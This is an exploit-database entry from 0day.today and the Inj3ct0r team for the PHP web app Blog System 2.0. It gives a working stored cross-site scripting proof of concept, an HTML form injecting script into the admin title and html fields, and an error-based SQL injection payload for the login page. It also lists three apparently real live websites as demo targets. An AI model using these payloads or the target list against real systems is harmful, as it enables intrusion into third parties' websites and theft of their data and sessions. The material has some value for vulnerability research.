Blog System 2.0 XSS/SQL Injection Vulnerability

🗓️ 27 Feb 2013 00:00:00Reported by DaOneType

zdt🔗 0day.today👁 15 Views

Blog System 2.0 XSS/SQL Injection Vulnerability. Exploits allow injection of JavaScript and SQL queries

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Blog System 2.0 XSS/SQL Injection Vulnerability
# Date: 2013-02-27
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.netartmedia.net/blogsystem/
# Category: webapps/php
# Version: 2.0
##########################################

[#] Cross Site Scripting
attacker can inject javascript in [title or html] fields
PoC: 
<form  action="http://site.com/BLOGSADMIN/index.php" method="post">
<input type=hidden name=category value="home">
<input type=hidden name=action value="welcome">
<input type=hidden name=SpecialProcessAddForm>
<input type=text name="title" value="<script>alert(document.cookie)</script>">
<input name="html" value="<script>alert(document.cookie)</script>">
<input type=submit value="submit"></form>


[#] SQL Injection
-Exploit-
http://site.com/BLOGSADMIN/loginaction.php
Request Data:
Email='%2B(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'&Password=123

-Demo-
http://blogsever.com/BLOGSADMIN/loginaction.php
http://www.mypublishingbook.com/BLOGSADMIN/loginaction.php
http://www.gamr15.com/BLOGSADMIN/loginaction.php


Greets to: All TGT Members..

#  0day.today [2018-03-06]  #

27 Feb 2013 00:00Current

7.1High risk

Vulners AI Score7.1